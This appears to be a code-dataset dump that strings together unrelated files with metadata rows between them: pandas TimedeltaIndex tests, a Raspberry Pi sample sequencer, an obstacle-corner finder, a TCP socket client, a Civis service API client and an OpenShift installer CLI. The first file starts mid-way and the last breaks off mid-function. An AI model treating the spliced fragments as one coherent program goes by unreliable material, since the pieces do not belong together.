expected = TimedeltaIndex(['5 day', '4 day', '3 day',
'2 day', '1 day'],
freq='-1D', name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
@pytest.mark.parametrize('key', [pd.Timestamp('1970-01-01'),
pd.Timestamp('1970-01-02'),
datetime(1970, 1, 1)])
def test_timestamp_invalid_key(self, key):
# GH#20464
tdi = pd.timedelta_range(0, periods=10)
with pytest.raises(TypeError):
tdi.get_loc(key)
class TestWhere:
# placeholder for symmetry with DatetimeIndex and PeriodIndex tests
pass
class TestTake:
def test_take(self):
# GH 10295
idx1 = timedelta_range('1 day', '31 day', freq='D', name='idx')
for idx in [idx1]:
result = idx.take([0])
assert result == Timedelta('1 day')
result = idx.take([-1])
assert result == Timedelta('31 day')
result = idx.take([0, 1, 2])
expected = timedelta_range('1 day', '3 day', freq='D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx.take([0, 2, 4])
expected = timedelta_range('1 day', '5 day', freq='2D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx.take([7, 4, 1])
expected = timedelta_range('8 day', '2 day', freq='-3D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx.take([3, 2, 5])
expected = TimedeltaIndex(['4 day', '3 day', '6 day'], name='idx')
tm.assert_index_equal(result, expected)
assert result.freq is None
result = idx.take([-3, 2, 5])
expected = TimedeltaIndex(['29 day', '3 day', '6 day'], name='idx')
tm.assert_index_equal(result, expected)
assert result.freq is None
def test_take_invalid_kwargs(self):
idx = timedelta_range('1 day', '31 day', freq='D', name='idx')
indices = [1, 6, 5, 9, 10, 13, 15, 3]
msg = r"take\(\) got an unexpected keyword argument 'foo'"
with pytest.raises(TypeError, match=msg):
idx.take(indices, foo=2)
msg = "the 'out' parameter is not supported"
with pytest.raises(ValueError, match=msg):
idx.take(indices, out=indices)
msg = "the 'mode' parameter is not supported"
with pytest.raises(ValueError, match=msg):
idx.take(indices, mode='clip')
# TODO: This method came from test_timedelta; de-dup with version above
def test_take2(self):
tds = ['1day 02:00:00', '1 day 04:00:00', '1 day 10:00:00']
idx = timedelta_range(start='1d', end='2d', freq='H', name='idx')
expected = TimedeltaIndex(tds, freq=None, name='idx')
taken1 = idx.take([2, 4, 10])
taken2 = idx[[2, 4, 10]]
for taken in [taken1, taken2]:
tm.assert_index_equal(taken, expected)
assert isinstance(taken, TimedeltaIndex)
assert taken.freq is None
assert taken.name == expected.name
def test_take_fill_value(self):
# GH 12631
idx = TimedeltaIndex(['1 days', '2 days', '3 days'],
name='xxx')
result = idx.take(np.array([1, 0, -1]))
expected = TimedeltaIndex(['2 days', '1 days', '3 days'],
name='xxx')
tm.assert_index_equal(result, expected)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = TimedeltaIndex(['2 days', '1 days', 'NaT'],
name='xxx')
tm.assert_index_equal(result, expected)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = TimedeltaIndex(['2 days', '1 days', '3 days'],
name='xxx')
tm.assert_index_equal(result, expected)
msg = ('When allow_fill=True and fill_value is not None, '
'all indices must be >= -1')
with pytest.raises(ValueError, match=msg):
idx.take(np.array([1, 0, -2]), fill_value=True)
with pytest.raises(ValueError, match=msg):
idx.take(np.array([1, 0, -5]), fill_value=True)
with pytest.raises(IndexError):
idx.take(np.array([1, -5]))
class TestTimedeltaIndex:
def test_insert(self):
idx = TimedeltaIndex(['4day', '1day', '2day'], name='idx')
result = idx.insert(2, timedelta(days=5))
exp = TimedeltaIndex(['4day', '1day', '5day', '2day'], name='idx')
tm.assert_index_equal(result, exp)
# insertion of non-datetime should coerce to object index
result = idx.insert(1, 'inserted')
expected = Index([Timedelta('4day'), 'inserted', Timedelta('1day'),
Timedelta('2day')], name='idx')
assert not isinstance(result, TimedeltaIndex)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
idx = timedelta_range('1day 00:00:01', periods=3, freq='s', name='idx')
# preserve freq
expected_0 = TimedeltaIndex(['1day', '1day 00:00:01', '1day 00:00:02',
'1day 00:00:03'],
name='idx', freq='s')
expected_3 = TimedeltaIndex(['1day 00:00:01', '1day 00:00:02',
'1day 00:00:03', '1day 00:00:04'],
name='idx', freq='s')
# reset freq to None
expected_1_nofreq = TimedeltaIndex(['1day 00:00:01', '1day 00:00:01',
'1day 00:00:02', '1day 00:00:03'],
name='idx', freq=None)
expected_3_nofreq = TimedeltaIndex(['1day 00:00:01', '1day 00:00:02',
'1day 00:00:03', '1day 00:00:05'],
name='idx', freq=None)
cases = [(0, Timedelta('1day'), expected_0),
(-3, Timedelta('1day'), expected_0),
(3, Timedelta('1day 00:00:04'), expected_3),
(1, Timedelta('1day 00:00:01'), expected_1_nofreq),
(3, Timedelta('1day 00:00:05'), expected_3_nofreq)]
for n, d, expected in cases:
result = idx.insert(n, d)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
# GH 18295 (test missing)
expected = TimedeltaIndex(['1day', pd.NaT, '2day', '3day'])
for na in (np.nan, pd.NaT, None):
result = timedelta_range('1day', '3day').insert(1, na)
tm.assert_index_equal(result, expected)
def test_delete(self):
idx = timedelta_range(start='1 Days', periods=5, freq='D', name='idx')
        # preserve freq
expected_0 = timedelta_range(start='2 Days', periods=4, freq='D',
name='idx')
expected_4 = timedelta_range(start='1 Days', periods=4, freq='D',
name='idx')
# reset freq to None
expected_1 = TimedeltaIndex(
['1 day', '3 day', '4 day', '5 day'], freq=None, name='idx')
cases = {0: expected_0,
-5: expected_0,
-1: expected_4,
4: expected_4,
1: expected_1}
for n, expected in cases.items():
result = idx.delete(n)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
with pytest.raises((IndexError, ValueError)):
# either depending on numpy version
idx.delete(5)
def test_delete_slice(self):
idx = timedelta_range(start='1 days', periods=10, freq='D', name='idx')
        # preserve freq
expected_0_2 = timedelta_range(start='4 days', periods=7, freq='D',
name='idx')
expected_7_9 = timedelta_range(start='1 days', periods=7, freq='D',
name='idx')
# reset freq to None
expected_3_5 = TimedeltaIndex(['1 d', '2 d', '3 d',
'7 d', '8 d', '9 d', '10d'],
freq=None, name='idx')
cases = {(0, 1, 2): expected_0_2,
(7, 8, 9): expected_7_9,
(3, 4, 5): expected_3_5}
for n, expected in cases.items():
result = idx.delete(n)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
result = idx.delete(slice(n[0], n[-1] + 1))
tm.assert_index_equal(result, expected)
assert result.name == expected.name
assert result.freq == expected.freq
def test_get_loc(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
for method in [None, 'pad', 'backfill', 'nearest']:
assert idx.get_loc(idx[1], method) == 1
assert idx.get_loc(idx[1].to_pytimedelta(), method) == 1
assert idx.get_loc(str(idx[1]), method) == 1
assert idx.get_loc(idx[1], 'pad',
tolerance=Timedelta(0)) == 1
assert idx.get_loc(idx[1], 'pad',
tolerance=np.timedelta64(0, 's')) == 1
assert idx.get_loc(idx[1], 'pad',
tolerance=timedelta(0)) == 1
with pytest.raises(ValueError, match='unit abbreviation w/o a number'):
idx.get_loc(idx[1], method='nearest', tolerance='foo')
with pytest.raises(
ValueError,
match='tolerance size must match'):
idx.get_loc(idx[1], method='nearest',
tolerance=[Timedelta(0).to_timedelta64(),
Timedelta(0).to_timedelta64()])
for method, loc in [('pad', 1), ('backfill', 2), ('nearest', 1)]:
assert idx.get_loc('1 day 1 hour', method) == loc
# GH 16909
assert idx.get_loc(idx[1].to_timedelta64()) == 1
# GH 16896
assert idx.get_loc('0 days') == 0
def test_get_loc_nat(self):
tidx = TimedeltaIndex(['1 days 01:00:00', 'NaT', '2 days 01:00:00'])
assert tidx.get_loc(pd.NaT) == 1
assert tidx.get_loc(None) == 1
assert tidx.get_loc(float('nan')) == 1
assert tidx.get_loc(np.nan) == 1
def test_get_indexer(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
tm.assert_numpy_array_equal(idx.get_indexer(idx),
np.array([0, 1, 2], dtype=np.intp))
target = pd.to_timedelta(['-1 hour', '12 hours', '1 day 1 hour'])
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
res = idx.get_indexer(target, 'nearest',
tolerance=Timedelta('1 hour'))
tm.assert_numpy_array_equal(res, np.array([0, -1, 1], dtype=np.intp))
|
bsd-3-clause
| 4,502,410,124,735,251,000
| 38.860947
| 79
| 0.5036
| false
| 3.850529
| true
| false
| false
|
Grumpy-Mike/Mikes-Pi-Bakery
|
Tap-A-LED_part2/software/Sequencer/sequencer1.py
|
1
|
3282
|
#!/usr/bin/env python3
# Sequencer1 by Mike Cook August 2020
#Plays samples from a file
import time
from pygame import mixer
import board
import neopixel
from caltap import CalTap
def main():
global markTime, stepTime
init()
print("Sequencer - playing samples through the audio output")
print("Tap to add or remove samples")
t = float(input("Please enter the speed in BPM "))
stepTime = 1/((t/60)*4) # assume 4 beats in a bar
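    # Worked example: at t = 120 BPM, t/60 = 2 beats per second and times 4
    # gives 8 sixteenth-note steps per second, so stepTime = 1/8 = 0.125 s.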
tapCount = 0
beingTouched = False
while 1:
if time.time() - markTime >= stepTime :
markTime = time.time()
nextStep()
if tap.touched() and not beingTouched:
pos = tap.getPos()
if pos[3] : # a valid reading
if pixels[pos[2]] != [0, 0, 0]:
pixels[pos[2]] = (0, 0, 0) # turn off
else:
pixels[pos[2]] = colours[pos[1]]
tapCount += 1
if tapCount >= len(colours) : tapCount = 0
beingTouched = True
pixels.show()
else :
if not tap.touched() : beingTouched = False
def init():
global colours, tap, pixels, posScan , stepTime, markTime
global colBuffer, sounds
# put your own colours here
colours = [(255, 0, 0), (255, 72, 0), (255, 145, 0),
(255, 218, 0), (218, 255, 0), (145, 255, 0),
(72, 255, 0), (0, 255, 0), (255,255,255) ]
tap = CalTap()
pixel_pin = board.D18
num_pixels = 128
# RGB or GRB. Some NeoPixels have red and green reversed
ORDER = neopixel.GRB
BRIGHTNESS = 0.1 # 0.6 is maximum brightness for 3A external supply
pixels = neopixel.NeoPixel(pixel_pin, num_pixels,
brightness = BRIGHTNESS, auto_write = False,
pixel_order = ORDER)
pixels.fill((0, 0, 0))
posScan = 0 ; stepTime = 0.3 ; markTime = time.time()
colBuffer = [(0,0,0)] * 8
mixer.pre_init(44100, -16, 12, 512)
mixer.init()
# change these to other sample names
soundNames = ["0", "1",
"2", "3",
"4", "5",
"6", "7" ]
# change Marimba to another directory containing your samples
sounds = [ mixer.Sound("Marimba/"+
soundNames[i]+".wav")
for i in range(0,len(soundNames))]
mixer.set_num_channels(16)
def nextStep():
global posScan
putCol(posScan)
posScan +=1
if posScan > 15 : posScan = 0
getCol(posScan)
for i in range(8):
pixels[i + posScan * 8] = dimCol(i)
pixels.show()
def dimCol(i):
thresh = 40
r = colBuffer[i][0]
g = colBuffer[i][1]
b = colBuffer[i][2]
if r > thresh :
r -= thresh
else: r += thresh
if g > thresh :
g -= thresh
else: g += thresh
if b > thresh :
b -= thresh
else: b += thresh
return ( r, g, b )
def putCol(pos): # restore old column of colours
for i in range(8):
pixels[i + pos * 8] = colBuffer[i]
def getCol(pos):
for i in range(8):
colBuffer[i] = pixels[i + pos * 8]
#print(colBuffer[i])
if (colBuffer[i] != [0, 0, 0]):
sounds[i].play()
# Main program logic:
if __name__ == '__main__':
main()
|
gpl-2.0
| -6,181,341,447,900,539,000
| 29.110092
| 71
| 0.532297
| false
| 3.345566
| false
| false
| false
|
Altair3/Tanks
|
bzagents/uberagent/ObstacleList.py
|
1
|
3631
|
from OccGrid import OccGrid
from geo import Point,Line
class ObstacleList(object):
def __init__(self, occgrid):
self.occgrid = occgrid
self.yMax = occgrid.yMax
self.yMin = self.yMax * -1
self.xMax = occgrid.xMax
self.xMin = self.xMax * -1
self.daList = []
self.threshold = .6
self.neighborCheckNumber = 1
def getObstaclePoints(self):
return self.daList
def removeCornersInBlock(self, x, y, length):
for p in self.daList:
pX = p.x
pY = p.y
if (pX <= (x+length)) and (pX >= x):
if (pY <= (y+length)) and (pY >= y):
self.daList.remove(p)
def scanGrid(self, startX, startY, length):
        length = 100  # the length argument is ignored; a fixed 100-cell scan window is used
self.removeCornersInBlock(startX, startY, length)
for x in range(startX, (startX+length+1)):
for y in range(startY, (startY+length+1)):
if (x < self.xMin) or (x > self.xMax) or (y < self.yMin) or (y > self.yMax):
continue
#print "Scanning:", "(" + str(x) + "," + str(y) + ")"
if self.isCorner(x,y):
self.daList.append(Point(x,y))
def isCorner(self, x, y):
if self.occgrid.get(x, y) >= self.threshold:
up = self.checkUp(x,y)
down = self.checkDown(x,y)
left = self.checkLeft(x,y)
right = self.checkRight(x,y)
if (up and left):
if ((not down) and (not right)):
return True
else:
return False
if (up and right):
if ((not down) and (not left)):
return True
else:
return False
if (down and left):
if ((not up) and (not right)):
return True
else:
return False
if (down and right):
if ((not up) and (not left)):
return True
else:
return False
return False
def checkUp(self, x, y):
number = 0
for i in range(1, self.neighborCheckNumber+1):
if (y + i) <= self.yMax:
prob = self.occgrid.get(x, (y+i))
if prob < self.threshold:
return False
return True
def checkDown(self, x, y):
for i in range(self.neighborCheckNumber, 0, -1):
if (y - i) >= self.yMin:
prob = self.occgrid.get(x, (y-i))
if prob < self.threshold:
return False
return True
def checkRight(self, x, y):
for i in range(1, self.neighborCheckNumber+1):
if (x + i) <= self.xMax:
prob = self.occgrid.get((x+i), y)
if prob < self.threshold:
return False
return True
def checkLeft(self, x, y):
for i in range(self.neighborCheckNumber, 0, -1):
if (x - i) >= self.xMin:
prob = self.occgrid.get((x-i), y)
if prob < self.threshold:
return False
return True
|
gpl-3.0
| 5,781,750,627,482,786,000
| 29.258333
| 92
| 0.41366
| false
| 4.212297
| false
| false
| false
|
caiorss/vboxcontrol
|
commandClient.py
|
1
|
4394
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from subprocess import PIPE, Popen
import platform
import os
import sys
import re
import zlib
from socket import socket
from socket import AF_INET, SOCK_STREAM, SHUT_RDWR
from socket import SOL_SOCKET, SO_REUSEADDR
localhost = '127.0.0.1'
allhosts = '0.0.0.0'
# Client version string reported to the server on connect. The value here is
# an assumed placeholder: VERSION is used in Client.connect_wait() but is not
# defined elsewhere in this module.
VERSION = '0.1'
import logging
import logging.config
LOG_SETTINGS = {
# --------- GENERAL OPTIONS ---------#
'version': 1,
'disable_existing_loggers': False,
'root': {
'level': 'NOTSET',
'handlers': ['file'],
},
#---------- HANDLERS ---------------#
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'NOTSET',
'formatter': 'detailed',
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'level': 'NOTSET',
'formatter': 'detailed',
'filename': 'client.log',
'mode': 'a',
'maxBytes': 10485760,
'backupCount': 5,
},
'tcp' : {
'class' : 'logging.handlers.SocketHandler',
'level' : 'INFO',
'host' : '192.168.1.2',
'port' : 9020,
'formatter': 'detailed',
},
},
# ----- FORMATTERS -----------------#
'formatters': {
'detailed': {
'format': '%(asctime)s %(module)-17s line:%(lineno)-4d %(funcName)s() ' \
'%(levelname)-8s %(message)s',
},
'verbose': {
'format': '%(levelname)-8s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt': '%a, %d %b %Y %H:%M:%S'
},
'email': {
'format': 'Timestamp: %(asctime)s\nModule: %(module)s\n' \
'Line: %(lineno)d\nMessage: %(message)s',
},
},
}
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('root')
class Client(object):
"""
    Stream socket client class -- no definitive name
"""
def __init__(self, host, port, buffersize=1024):
self.host = host
self.port = port
self.buffersize = 1024
# Clients IP's connected to this server
self.clients = []
# Client Sockets List
self.connst = []
self.sock = None
self.mode = "shell"
def connect(self):
"""
        Try to connect to the server once; return True if the
        connection succeeds, False otherwise.
"""
# create socket handler
s = socket(AF_INET, SOCK_STREAM)
self.sock = s
try:
self.sock.connect((self.host, self.port))
return True
except:
return False
def connect_wait(self):
"""
        Keep trying to connect to the server indefinitely,
        even while the server is down.
"""
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock = s
logger.info("Client waiting server connection")
while True:
try:
self.sock.connect((self.host, self.port))
self.sendc("Client v%s Started from %s - %s " % ( VERSION, os.getcwd(), platform.platform() ))
break
except:
pass
logger.info("Client connected to server OK")
def sendc(self, msg):
"""
        Send a flow-control message to the server.
"""
self.sock.sendall(msg)
def recevc(self):
"""
        Receive a control message from the server.
"""
logger.info("wainting token")
while True:
data = self.sock.recv(self.buffersize)
#print data
if not data:
continue
else:
# logger.debug("len(data) =%s" % len(data))
# data2 = zlib.decompress(data)
# logger.debug("len(data2) =%s" % len(data2))
return data
def handling_connections(self):
pass
def send(self):
pass
class CommandClient(Client):
def __init__(self, host, port, buffersize):
super(CommandClient, self).__init__(host=host, port=port, buffersize=buffersize)
c = CommandClient(host='localhost', port=9090, buffersize=1024)
c.connect()
c.sendc("Hello world server")
|
unlicense
| 8,847,994,244,525,383,000
| 23.016393
| 110
| 0.506827
| false
| 3.923214
| false
| false
| false
|
civisanalytics/civis-python
|
civis/service_client.py
|
1
|
8958
|
from collections import OrderedDict
from functools import lru_cache
import json
from jsonref import JsonRef
import re
import requests
import warnings
from civis import APIClient
from civis.base import CivisAPIError, Endpoint, tostr_urljoin
from civis.resources._resources import parse_method
from civis._utils import to_camelcase
def _get_service(client):
if client._api_key:
api_client = APIClient(client._api_key)
else:
api_client = APIClient()
service = api_client.services.get(client._service_id)
return service
def auth_service_session(session, client):
service = _get_service(client)
auth_url = service['current_deployment']['displayUrl']
# Make request for adding Authentication Cookie to session
session.get(auth_url)
def _parse_service_path(path, operations, root_path=None):
""" Parse an endpoint into a class where each valid http request
on that endpoint is converted into a convenience function and
attached to the class as a method.
"""
if root_path is not None:
path = path.replace(root_path, '')
path = path.strip('/')
modified_base_path = re.sub("-", "_", path.split('/')[0].lower())
methods = []
for verb, op in operations.items():
method = parse_method(verb, op, path)
if method is None:
continue
methods.append(method)
return modified_base_path, methods
def parse_service_api_spec(api_spec, root_path=None):
"""Dynamically create classes to interface with a Civis Service API.
Parse an OpenAPI (Swagger) specification into a dictionary of classes
where each class represents an endpoint resource and contains
methods to make http requests on that resource.
Parameters
----------
api_spec : OrderedDict
The Civis Service API specification to parse. References should be
resolved before passing, typically using jsonref.JsonRef().
root_path : str, optional
An additional path for APIs that are not hosted on the service's
root level. An example root_path would be '/api' for an app with
resource endpoints that all begin with '/api'.
"""
paths = api_spec['paths']
classes = {}
for path, ops in paths.items():
base_path, methods = _parse_service_path(
path, ops, root_path=root_path)
class_name = to_camelcase(base_path)
if methods and classes.get(base_path) is None:
classes[base_path] = type(str(class_name),
(ServiceEndpoint,),
{})
for method_name, method in methods:
setattr(classes[base_path], method_name, method)
return classes
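# Illustrative note (hypothetical spec): a spec whose only path is "/api/records"
# with a single GET operation, parsed with root_path='/api', yields
# {'records': <ServiceEndpoint subclass>}, where the generated class carries one
# method per operation recognized by parse_method().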
class ServiceEndpoint(Endpoint):
def __init__(self, client,
return_type='civis'):
self._return_type = return_type
self._client = client
def _build_path(self, path):
if not path:
return self._client._base_url
if not self._client._root_path:
return tostr_urljoin(self._client._base_url, path.strip("/"))
return tostr_urljoin(self._client._base_url,
self._client._root_path.strip("/"),
path.strip("/"))
def _make_request(self, method, path=None, params=None, data=None,
**kwargs):
url = self._build_path(path)
with requests.Session() as sess:
auth_service_session(sess, self._client)
with self._lock:
response = sess.request(method, url, json=data,
params=params, **kwargs)
if not response.ok:
raise CivisAPIError(response)
return response
class ServiceClient():
def __init__(self, service_id, root_path=None,
swagger_path="/endpoints", api_key=None,
return_type='snake', local_api_spec=None):
"""Create an API Client from a Civis service.
Parameters
----------
service_id : str, required
The Id for the service that will be used to generate the client.
root_path : str, optional
An additional path for APIs that are not hosted on the service's
root level. An example root_path would be '/api' for an app with
resource endpoints that all begin with '/api'.
swagger_path : str, optional
The endpoint path that will be used to download the API Spec.
The default value is '/endpoints' but another common path
might be '/spec'. The API Spec must be compliant with Swagger
2.0 standards.
api_key : str, optional
Your API key obtained from the Civis Platform. If not given, the
client will use the :envvar:`CIVIS_API_KEY` environment variable.
This API key will need to be authorized to access the service
used for the client.
return_type : str, optional
The following types are implemented:
- ``'raw'`` Returns the raw :class:`requests:requests.Response`
object.
- ``'snake'`` Returns a :class:`civis.response.Response` object
for the json-encoded content of a response. This maps the
top-level json keys to snake_case.
- ``'pandas'`` Returns a :class:`pandas:pandas.DataFrame` for
list-like responses and a :class:`pandas:pandas.Series` for
a single json response.
local_api_spec : collections.OrderedDict or string, optional
The methods on this class are dynamically built from the Service
API specification, which can be retrieved from the /endpoints
endpoint. When local_api_spec is None, the default, this
specification is downloaded the first time APIClient is
instantiated. Alternatively, a local cache of the specification
may be passed as either an OrderedDict or a filename which
points to a json file.
"""
if return_type not in ['snake', 'raw', 'pandas']:
raise ValueError("Return type must be one of 'snake', 'raw', "
"'pandas'")
self._api_key = api_key
self._service_id = service_id
self._base_url = self.get_base_url()
self._root_path = root_path
self._swagger_path = swagger_path
classes = self.generate_classes_maybe_cached(local_api_spec)
for class_name, klass in classes.items():
setattr(self, class_name, klass(client=self,
return_type=return_type))
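# Usage sketch (hypothetical service id; attribute and method names are
# generated from the downloaded API spec, so the names below are placeholders):
# sc = ServiceClient('12345', root_path='/api')
# resp = sc.some_resource.some_method()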
def parse_path(self, path, operations):
""" Parse an endpoint into a class where each valid http request
on that endpoint is converted into a convenience function and
attached to the class as a method.
"""
warnings.warn("This method is deprecated and will be removed in "
"v2.0.0. Use the `_parse_service_path` function "
"instead.")
return _parse_service_path(path, operations, root_path=self._root_path)
def parse_api_spec(self, api_spec):
warnings.warn("This method is deprecated and will be removed in "
"v2.0.0. Use the `parse_service_api_spec` function "
"instead.")
return parse_service_api_spec(api_spec, root_path=self._root_path)
@lru_cache(maxsize=4)
def get_api_spec(self):
swagger_url = self._base_url + self._swagger_path
with requests.Session() as sess:
auth_service_session(sess, self)
response = sess.get(swagger_url)
response.raise_for_status()
spec = response.json(object_pairs_hook=OrderedDict)
return spec
@lru_cache(maxsize=4)
def generate_classes(self):
raw_spec = self.get_api_spec()
spec = JsonRef.replace_refs(raw_spec)
return parse_service_api_spec(spec, root_path=self._root_path)
def get_base_url(self):
service = _get_service(self)
return service['current_url']
def generate_classes_maybe_cached(self, cache):
"""Generate class objects either from /endpoints or a local cache."""
if cache is None:
classes = self.generate_classes()
else:
if isinstance(cache, OrderedDict):
raw_spec = cache
elif isinstance(cache, str):
with open(cache, "r") as f:
raw_spec = json.load(f, object_pairs_hook=OrderedDict)
else:
msg = "cache must be an OrderedDict or str, given {}"
raise ValueError(msg.format(type(cache)))
spec = JsonRef.replace_refs(raw_spec)
classes = parse_service_api_spec(spec, root_path=self._root_path)
return classes
|
bsd-3-clause
| 3,145,371,179,698,265,000
| 39.170404
| 79
| 0.605492
| false
| 4.335915
| false
| false
| false
|
spinolacastro/openshift-ansible
|
utils/src/ooinstall/cli_installer.py
|
1
|
31532
|
# TODO: Temporarily disabled due to importing old code into openshift-ansible
# repo. We will work on these over time.
# pylint: disable=bad-continuation,missing-docstring,no-self-use,invalid-name,no-value-for-parameter
import click
import os
import re
import sys
from ooinstall import openshift_ansible
from ooinstall import OOConfig
from ooinstall.oo_config import OOConfigInvalidHostError
from ooinstall.oo_config import Host
from ooinstall.variants import find_variant, get_variant_version_combos
DEFAULT_ANSIBLE_CONFIG = '/usr/share/atomic-openshift-utils/ansible.cfg'
DEFAULT_PLAYBOOK_DIR = '/usr/share/ansible/openshift-ansible/'
def validate_ansible_dir(path):
if not path:
raise click.BadParameter('An ansible path must be provided')
return path
# if not os.path.exists(path)):
# raise click.BadParameter("Path \"{}\" doesn't exist".format(path))
def is_valid_hostname(hostname):
if not hostname or len(hostname) > 255:
return False
if hostname[-1] == ".":
hostname = hostname[:-1] # strip exactly one dot from the right, if present
allowed = re.compile(r"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
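# Examples (sketch): is_valid_hostname("master1.example.com") -> True;
# is_valid_hostname("-bad.example.com") -> False (labels may not start or end with '-');
# is_valid_hostname("a" * 256) -> False (total length is capped at 255).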
def validate_prompt_hostname(hostname):
if '' == hostname or is_valid_hostname(hostname):
return hostname
raise click.BadParameter('Invalid hostname. Please double-check this value and re-enter it.')
def get_ansible_ssh_user():
click.clear()
message = """
This installation process will involve connecting to remote hosts via ssh. Any
account may be used; however, if a non-root account is used, it must have
passwordless sudo access.
"""
click.echo(message)
return click.prompt('User for ssh access', default='root')
def list_hosts(hosts):
hosts_idx = range(len(hosts))
for idx in hosts_idx:
click.echo(' {}: {}'.format(idx, hosts[idx]))
def delete_hosts(hosts):
while True:
list_hosts(hosts)
del_idx = click.prompt('Select host to delete, y/Y to confirm, ' \
'or n/N to add more hosts', default='n')
try:
del_idx = int(del_idx)
hosts.remove(hosts[del_idx])
except IndexError:
click.echo("\"{}\" doesn't match any hosts listed.".format(del_idx))
except ValueError:
try:
response = del_idx.lower()
if response in ['y', 'n']:
return hosts, response
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
except AttributeError:
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
return hosts, None
def collect_hosts(oo_cfg, existing_env=False, masters_set=False, print_summary=True):
"""
Collect host information from user. This will later be filled in using
ansible.
Returns: a list of host information collected from the user
"""
click.clear()
click.echo('*** Host Configuration ***')
message = """
You must now specify the hosts that will compose your OpenShift cluster.
Please enter an IP or hostname to connect to for each system in the cluster.
You will then be prompted to identify what role you would like this system to
serve in the cluster.
OpenShift Masters serve the API and web console and coordinate the jobs to run
across the environment. If desired you can specify multiple Master systems for
an HA deployment, in which case you will be prompted to identify a *separate*
system to act as the load balancer for your cluster after all Masters and Nodes
are defined.
If only one Master is specified, an etcd instance embedded within the OpenShift
Master service will be used as the datastore. This can be later replaced with a
separate etcd instance if desired. If multiple Masters are specified, a
separate etcd cluster will be configured with each Master serving as a member.
Any Masters configured as part of this installation process will also be
configured as Nodes. This is so that the Master will be able to proxy to Pods
from the API. By default this Node will be unschedulable but this can be changed
after installation with 'oadm manage-node'.
OpenShift Nodes provide the runtime environments for containers. They will
host the required services to be managed by the Master.
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#master
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#node
"""
click.echo(message)
hosts = []
more_hosts = True
num_masters = 0
while more_hosts:
host_props = {}
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_hostname)
if not masters_set:
if click.confirm('Will this host be an OpenShift Master?'):
host_props['master'] = True
num_masters += 1
if oo_cfg.settings['variant_version'] == '3.0':
masters_set = True
host_props['node'] = True
host_props['containerized'] = False
if oo_cfg.settings['variant_version'] != '3.0':
rpm_or_container = click.prompt('Will this host be RPM or Container based (rpm/container)?',
type=click.Choice(['rpm', 'container']),
default='rpm')
if rpm_or_container == 'container':
host_props['containerized'] = True
if existing_env:
host_props['new_host'] = True
else:
host_props['new_host'] = False
host = Host(**host_props)
hosts.append(host)
if print_summary:
print_installation_summary(hosts, oo_cfg.settings['variant_version'])
# If we have one master, this is enough for an all-in-one deployment,
# thus we can start asking if you wish to proceed. Otherwise we assume
# you must.
if masters_set or num_masters != 2:
more_hosts = click.confirm('Do you want to add additional hosts?')
if num_masters >= 3:
collect_master_lb(hosts)
return hosts
def print_installation_summary(hosts, version=None):
"""
Displays a summary of all hosts configured thus far, and what role each
will play.
Shows total nodes/masters, hints for performing/modifying the deployment
with additional setup, warnings for invalid or sub-optimal configurations.
"""
click.clear()
click.echo('*** Installation Summary ***\n')
click.echo('Hosts:')
for host in hosts:
print_host_summary(hosts, host)
masters = [host for host in hosts if host.master]
nodes = [host for host in hosts if host.node]
dedicated_nodes = [host for host in hosts if host.node and not host.master]
click.echo('')
click.echo('Total OpenShift Masters: %s' % len(masters))
click.echo('Total OpenShift Nodes: %s' % len(nodes))
if len(masters) == 1 and version != '3.0':
ha_hint_message = """
NOTE: Add a total of 3 or more Masters to perform an HA installation."""
click.echo(ha_hint_message)
elif len(masters) == 2:
min_masters_message = """
WARNING: A minimum of 3 masters are required to perform an HA installation.
Please add one more to proceed."""
click.echo(min_masters_message)
elif len(masters) >= 3:
ha_message = """
NOTE: Multiple Masters specified, this will be an HA deployment with a separate
etcd cluster. You will be prompted to provide the FQDN of a load balancer once
finished entering hosts."""
click.echo(ha_message)
dedicated_nodes_message = """
WARNING: Dedicated Nodes are recommended for an HA deployment. If no dedicated
Nodes are specified, each configured Master will be marked as a schedulable
Node."""
min_ha_nodes_message = """
WARNING: A minimum of 3 dedicated Nodes are recommended for an HA
deployment."""
if len(dedicated_nodes) == 0:
click.echo(dedicated_nodes_message)
elif len(dedicated_nodes) < 3:
click.echo(min_ha_nodes_message)
click.echo('')
def print_host_summary(all_hosts, host):
click.echo("- %s" % host.connect_to)
if host.master:
click.echo(" - OpenShift Master")
if host.node:
if host.is_dedicated_node():
click.echo(" - OpenShift Node (Dedicated)")
elif host.is_schedulable_node(all_hosts):
click.echo(" - OpenShift Node")
else:
click.echo(" - OpenShift Node (Unscheduled)")
if host.master_lb:
if host.preconfigured:
